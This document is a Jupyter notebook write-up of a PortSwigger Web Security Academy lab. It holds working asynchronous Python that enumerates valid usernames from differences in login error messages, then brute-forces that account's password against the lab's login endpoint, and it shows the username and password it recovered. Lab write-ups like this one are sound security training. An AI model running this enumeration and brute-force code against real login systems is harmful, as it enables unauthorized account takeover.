# Password Based Login - Username Enumeration: Different Responses (Async)

This notebook demonstrates how to perform GET/POST requests in an asynchronous manner. I've played around and tried to work out the fastest way to do this, and I even have a nice tqdm loading bar to track the progress.

This might be useful for web scraping and brute forcing.

We'll essentially try to do username enumeration plus password brute forcing. The lab descrption is here: 

https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses

In [1]:
import aiohttp
import asyncio
import async_timeout
import os
import tqdm.notebook as tq

#Important for jupyter
import nest_asyncio
nest_asyncio.apply()

from load_un_pw import get_un_pw

In [2]:
usernames, passwords = get_un_pw()

## Enumerate Usernames

In [3]:
URL = "https://ac861fe81e68b541c0cea93a00f100cf.web-security-academy.net/"

#Loop through usernames performing ansynchronous requests
#This does use global variables, which is think is OK in this context given it's just a small script

async def test_uname(session, each_username):
    async with session.post(URL + "login", data={"username" : each_username, "password" : "test123"}) as response:
        return [each_username, 'Invalid username' in await response.text()]

        
async def main():
    async with aiohttp.ClientSession() as session:
        tasks = [test_uname(session, each_username) for each_username in usernames]
    
        return [await f for f in tq.tqdm(asyncio.as_completed(tasks), total = len(tasks))]
    

results = asyncio.run(main())

  0%|          | 0/101 [00:00<?, ?it/s]

Now we can easily find the username of the valid user

In [4]:
valid_username = [x[0] for x in results if x[1]==False]
valid_username

['austin']

## Password guessing
Now to brute force the password. Same basic method.

In [5]:
async def try_password(session, each_password):
    async with session.post(URL + "login", 
                      data = {"username" : valid_username, "password" : each_password}
                     ) as response:
        return [each_password, "Your username is:" in await response.text()]
    
async def password_brute_force():
    async with aiohttp.ClientSession() as session:
        tasks = [try_password(session, x) for x in passwords]
        return [await f for f in tq.tqdm(asyncio.as_completed(tasks), total=len(tasks))]
        
results = asyncio.run(password_brute_force())

  0%|          | 0/100 [00:00<?, ?it/s]

In [6]:
valid_password = [x[0] for x in results if x[1] == True][0]
valid_password

'2000'

Yay! The whole script runs in only a couple of seconds. Pretty cool hey.